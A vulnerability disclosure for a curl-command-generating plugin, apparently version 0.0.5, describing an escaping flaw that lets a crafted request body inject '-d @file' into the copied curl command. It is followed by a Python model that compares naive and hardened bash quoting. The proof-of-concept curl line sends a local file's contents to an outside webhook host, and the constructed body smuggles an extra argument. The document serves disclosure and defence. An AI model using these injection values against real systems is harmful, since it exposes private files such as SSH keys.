Developer's Note: This vulnerability affected a pre-release version (0.0.5) and while it's unlikely to be exploited I'd like to share it as it's pretty fun 🥳 Thank you to @Sim4n6 for testing and reporting 🙏
Original report follows, unedited:
Summary
Some characters are not being escaped as expected, which may lead to curl argument injection; in turn, this can be exploited to leak sensitive files.
curl -x http://127.0.0.1:8080 -k $'https://webhook.site/2f079076-58df-41d9-90e9-d362e01727a0/testing/endpoint' -X $'POST' -H $'Host: webhook.site' -H $'User-Agent: python-requests/2.31.0' -H $'Accept-Encoding: gzip, deflate' -H $'Accept: */*' -H $'Connection: keep-alive' -H $'Cookie: secret=155ee356-23a6-11f0-af46-678665dcd42c' -H $'X-Forwarded-For: 127.0.0.1' -H $'Content-Length: 66' -H $'Content-Type: application/x-www-form-urlencoded' --data-binary $'action=delete&csrf=7e5dbebc12&aaaa\\\'%[email protected]%20-d\\\'da=ssss'
The command would proxy a simple POST request; when copied with the plugin, it leaks the content of a file named sim4n6.txt.
PoC
https://youtu.be/m8lDrcUpNkQ
Impact
Arbitrary file read, though not very arbitrary: more .ssh private-key oriented.
References
https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome
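As an added illustration (this is not part of the developer's note, the original report, or the plugin's code), the Python below models the bash ANSI-C `$'...'` quoting that the generated curl command relies on. It contains a small tokenizer for that quoting style, a naive quoting function that escapes only the single quote, and a hardened one that escapes the backslash first. The request body, the `/tmp/example_secret` path and the function names are all constructed for the example. Feeding a body that contains a backslash followed by a quote through both quoting functions shows why the naive one lets `-d @file` become separate curl arguments (curl reads the request body from `file` when the `-d` value starts with `@`, which is the behaviour the PortSwigger reference describes) and why the hardened one keeps the body a single argument.

```python
"""Model of bash $'...' quoting: tokenizer plus naive vs. hardened quoting.

Added example for the advisory above; everything here is constructed and
is not the plugin's own code.
"""


def quote_ansi_c_naive(s):
    """Vulnerable: escapes only the quote. Input '\\'' becomes '\\\\'' inside
    the $'...' string, i.e. an escaped backslash followed by a real closing
    quote, so the rest of the body is parsed as new shell words."""
    return "$'" + s.replace("'", "\\'") + "'"


def quote_ansi_c(s):
    """Hardened: escape the escape character first, then the quote, so no
    input byte can terminate the $'...' string early."""
    return "$'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"


def split_ansi_c(cmdline):
    """Split a command line the way bash would for the subset of syntax that
    matters here: whitespace-separated words, $'...' strings with backslash
    escapes, plain '...' strings, and unquoted backslash escapes.
    Raises ValueError on unbalanced quoting (bash would report a syntax error)."""
    args, cur, in_word = [], [], False
    i, n = 0, len(cmdline)
    escapes = {"n": "\n", "t": "\t", "\\": "\\", "'": "'"}
    while i < n:
        c = cmdline[i]
        if c.isspace():
            if in_word:
                args.append("".join(cur))
                cur, in_word = [], False
            i += 1
            continue
        in_word = True
        if cmdline.startswith("$'", i):
            i += 2
            while i < n and cmdline[i] != "'":
                if cmdline[i] == "\\":
                    if i + 1 >= n:
                        raise ValueError("dangling backslash in $'...' string")
                    nxt = cmdline[i + 1]
                    # Unknown escapes keep the backslash, as bash does.
                    cur.append(escapes.get(nxt, "\\" + nxt))
                    i += 2
                else:
                    cur.append(cmdline[i])
                    i += 1
            if i >= n:
                raise ValueError("unterminated $'...' string")
            i += 1  # consume the closing quote
        elif c == "'":
            # Plain single quotes: no escapes at all inside.
            end = cmdline.find("'", i + 1)
            if end == -1:
                raise ValueError("unterminated '...' string")
            cur.append(cmdline[i + 1:end])
            i = end + 1
        elif c == "\\":
            # Unquoted backslash escapes the next character.
            if i + 1 >= n:
                raise ValueError("dangling backslash")
            cur.append(cmdline[i + 1])
            i += 2
        else:
            cur.append(c)
            i += 1
    if in_word:
        args.append("".join(cur))
    return args


def curl_argv_for_body(body, quote):
    """Return the argv bash would hand to curl for '--data-binary <body>'
    when <body> is quoted with the given function."""
    return split_ansi_c("curl --data-binary " + quote(body))


# Constructed request body (not the advisory's PoC). The first backslash-quote
# pair breaks out of the $'...' string; the second re-enters a plain '...'
# string so the whole line stays balanced and bash accepts it.
BODY = "a=1&b=\\' -d @/tmp/example_secret -d \\'c=2"

if __name__ == "__main__":
    print("naive   :", curl_argv_for_body(BODY, quote_ansi_c_naive))
    print("hardened:", curl_argv_for_body(BODY, quote_ansi_c))
```

With the naive quoting the tokenizer returns seven words, including a standalone `-d` and `@/tmp/example_secret`, so curl would read that file into the request body; with the hardened quoting the body comes back as exactly one argument equal to the original input. A unit test of the form `split_ansi_c(quote(x)) == [x]` over a corpus of bodies containing backslashes, quotes, whitespace and `@` characters is the check that would have caught this class of bug before release.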